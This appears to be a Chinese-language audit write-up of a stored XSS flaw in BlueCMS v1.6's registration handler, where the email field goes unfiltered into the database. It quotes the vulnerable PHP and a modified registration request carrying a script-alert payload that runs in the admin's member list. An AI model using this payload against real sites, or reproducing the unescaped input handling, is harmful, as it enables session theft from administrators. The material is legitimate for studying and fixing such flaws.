bluecms
BlueCMS是一款專注於地方門戶網站建設解決方案,基於PHP+MySQL的技術開發,全部源碼開放。
復現版本爲bluecmsv1.6版本,各位可自行下載。
代碼審計
這次不用Seay挖xss漏洞,我們通過關鍵功能測試來審計xss漏洞。
在後臺->會員管理->會員列表處,管理員是可以查看會員信息的,要是此處信息能從前臺插入xss代碼,就能盜取管理員cookie。
來到前臺會員註冊處,嘗試註冊一個用戶,可以看到可控的有用戶名,郵箱,密碼一般不考慮。
提交註冊,抓包具體分析一下,可以看到走的是user.php的do_reg方法。
來到代碼所在處,可以看到用戶名有長度限制,郵箱沒有過濾直接插入sql語句,那應該郵箱處可以插入我們的xss代碼。
elseif($act == 'do_reg'){
$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
$pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
$pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
$email = !empty($_POST['email']) ? trim($_POST['email']) : '';
$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
$from = !empty($from) ? base64_decode($from) : 'user.php';
if(strlen($user_name) < 4 || strlen($user_name) > 16){
showmsg('用戶名字符長度不符');
}
if(strlen($pwd) < 6){
showmsg('密碼不能少於6個字符');
}
if($pwd != $pwd1){
showmsg('兩次輸入密碼不一致');
}
if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
showmsg('驗證碼錯誤');
}
if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
showmsg('該用戶名已存在');
}
if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
showmsg('該用戶名已存在');
}
$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
if(!$db->query($sql)){
showmsg('很遺憾,註冊中出錯啦');
}else{
$_SESSION['user_id'] = $db->insert_id();
$_SESSION['user_name'] = $user_name;
update_user_info($_SESSION['user_name']);
setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
{
$uid = uc_user_register($user_name, $pwd, $email);
if($uid <= 0)
{
if($uid == -1)
{
showmsg('用戶名不合法!');
}
elseif($uid == -2)
{
showmsg('包含不允許註冊的詞語!');
}
elseif($uid == -3)
{
showmsg('你指定的用戶名 '.$user_name.' 已存在,請使用別的用戶名!');
}
elseif($uid == -4){
showmsg('您使用的Email格式不對!');
}
elseif($uid == -5)
{
showmsg('你使用的Email 不允許註冊!');
}
else
{
showmsg('註冊失敗!');
}
}
else
{
$ucsynlogin = uc_user_synlogin($uid);
echo $ucsynlogin;
}
}
$_SESSION['last_reg'] = $timestamp;
showmsg('恭喜您註冊成功,現在將轉向...', $from);
}
}
漏洞復現
前端有js驗證郵箱合法性,那我們輸入正確的郵箱地址,抓包進行修改。
referer=&user_name=xss123&pwd=123456&pwd1=123456&email=haha%40qq.com<script>alert(1)</script>&safecode=rc4d&from=&act=do_reg
可以看到註冊成功,登錄xss123用戶,直接彈窗。
以管理員登錄後臺,查看會員列表,也成功彈窗,xss代碼也確實插入成功。